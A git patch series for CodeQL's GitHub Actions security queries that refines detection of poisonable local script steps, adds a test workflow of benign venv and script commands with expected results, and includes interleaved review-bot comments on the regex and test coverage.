@@ -294,6 +294,16 @@ edges | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -322,5 +332,8 @@ edges | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 61c328b7011d..e0164eafac85 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,5 +1,6 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 966a9b1652a6e4f635356fdc7bba27c69c5a2c6a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 4 Jul 2024 13:05:27 +0200 Subject: [PATCH 377/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 34000094dd85..59ab88b42e41 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.12 +version: 0.1.13 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5ccbc7b96578..f25fd70619fd 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.12 +version: 0.1.13 groups: [actions, queries] suites: codeql-suites extractor: javascript From e5064f80902240969b4269fa031f79cebd32bbf4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Jul 2024 18:16:50 +0200 Subject: [PATCH 378/707] Improve poisonable steps --- .../actions/security/PoisonableSteps.qll | 4 +- ql/lib/ext/config/poisonable_steps.yml | 1 + .../.github/workflows/poisonable_steps.yml | 25 ++ .../library-tests/poisonable_steps.expected | 18 ++ ql/test/library-tests/poisonable_steps.ql | 5 + ql/test/library-tests/test.expected | 241 ++++++++++++++++++ .../CWE-829/.github/workflows/test7.yml | 58 +++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 24 ++ 9 files changed, 376 insertions(+), 1 deletion(-) create mode 100644 ql/test/library-tests/.github/workflows/poisonable_steps.yml create mode 100644 ql/test/library-tests/poisonable_steps.expected create mode 100644 ql/test/library-tests/poisonable_steps.ql create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index dc0f3876f86f..b0c6f7aa6a9d 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -30,7 +30,9 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) - cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\|)\\s*" + regexp + "\\s*(;|\\||\\)|`|$).*", group) + cmd = + line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", + group) ) } 
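Review bot: The rewritten regular expression on the `cmd =` lines adds `&&` on both sides and a bare `-` as a trailing terminator with no comment saying what each alternative stands for, while the commented-out first attempt `//cmd = line.regexpCapture(".*(^|\\b|\\s+|...` is still kept above it, so a reader now sees three variants and no rationale. Deleting the dead line and adding a comment such as `// command must start the line or follow ;, $(, backtick, | or &&, and be followed by ;, |, ), backtick, an option (-), && or end of line` would make the next change to this pattern safer. The `-` alternative accepts any dash-prefixed token, so `venv/bin/activate.sh -x` matches as intended, but `||` is only matched through the single-`|` alternative and commands continued with a trailing backslash are still cut by the `splitAt("\n")` above — each deserves a line in the new fixture if it is meant to be covered. The enclosing predicate starts before the hunk.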
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml
index f13a2a16d359..ff3df1f699c6 100644
--- a/ql/lib/ext/config/poisonable_steps.yml
+++ b/ql/lib/ext/config/poisonable_steps.yml
@@ -58,6 +58,7 @@ extensions:
     data:
       # TODO: It could also be in the form of `dir/cmd`
       - ["(\\.\\/)(.*)", 3]
+      - ["(\\.\\s+)(.*)", 3] # eg: . venv/bin/activate
       - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3]
       - ["(node)\\s+(.*)(\\.js|\\.ts)", 3]
       - ["(python)\\s+(.*)\\.py", 3]
diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml
new file mode 100644
index 000000000000..3e31507cef1e
--- /dev/null
+++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml
@@ -0,0 +1,25 @@
+on: push
+
+jobs:
+  local_commands:
+    runs-on: ubuntu-latest
+    steps:
+      - run: venv/bin/activate # not supported yet
+      - run: . venv/bin/activate
+      - run: echo foo; . venv/bin/activate
+      - run: echo foo;. venv/bin/activate
+      - run: echo foo |. venv/bin/activate
+      - run: ./venv/bin/activate
+      - run: sh venv/bin/activate.sh
+      - run: echo $(sh venv/bin/activate.sh)
+      - run: echo foo; sh venv/bin/activate.sh; echo bar
+      - run: echo foo | sh venv/bin/activate.sh > output
+      - run: python venv/bin/activate.py
+      - run: echo foo; python venv/bin/activate.py
+      - run: pnpm run test:ct
+      - run: pip install nbformat && python scripts/generate_notebooks.py
+      - run: python scripts/generate_theme.py --outfile js/storybook/theme.css
+      - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css
+      - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css
+
+
diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected
new file mode 100644
index 000000000000..62ffff3c15c2
--- /dev/null
+++ b/ql/test/library-tests/poisonable_steps.expected
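Review bot: Every `run` line in this fixture except the first is a positive case, so the new `-` and `&&` delimiters added to the pattern in PoisonableSteps.qll are never exercised against input that must not match; a few negative lines such as `- run: echo foo-bar` and `- run: pip install -r requirements.txt`, which the expected file would then have to leave out, would catch the terminator over-matching. The `# not supported yet` marker on the first step is useful, and the same inline style could say which data-model row each of the other lines targets (e.g. `. venv/bin/activate` exercises the new `(\\.\\s+)(.*)` entry), since poisonable_steps.expected records only locations.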
@@ -0,0 +1,18 @@
+| .github/workflows/multiline.yml:24:9:30:6 | Run Step |
+| .github/workflows/multiline.yml:63:9:66:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step |
+| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step |
diff --git a/ql/test/library-tests/poisonable_steps.ql b/ql/test/library-tests/poisonable_steps.ql
new file mode 100644
index 000000000000..1aacdd14d140
--- /dev/null
+++ b/ql/test/library-tests/poisonable_steps.ql
@@ -0,0 +1,5 @@
+import actions
+import codeql.actions.security.PoisonableSteps
+
+from PoisonableStep step
+select step
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index b09473fc1321..efb0bca69528 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
@@ -1,21 +1,25 @@ files | .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -41,6 +45,23 @@ steps | .github/workflows/multiline.yml:71:9:78:6 | Run Step | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -69,6 +90,23 @@ runSteps | .github/workflows/multiline.yml:71:9:78:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:78:9:85:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| 
.github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -130,6 +168,23 @@ runStepChildren | .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | 
.github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -282,6 +337,82 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | 
.github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | 
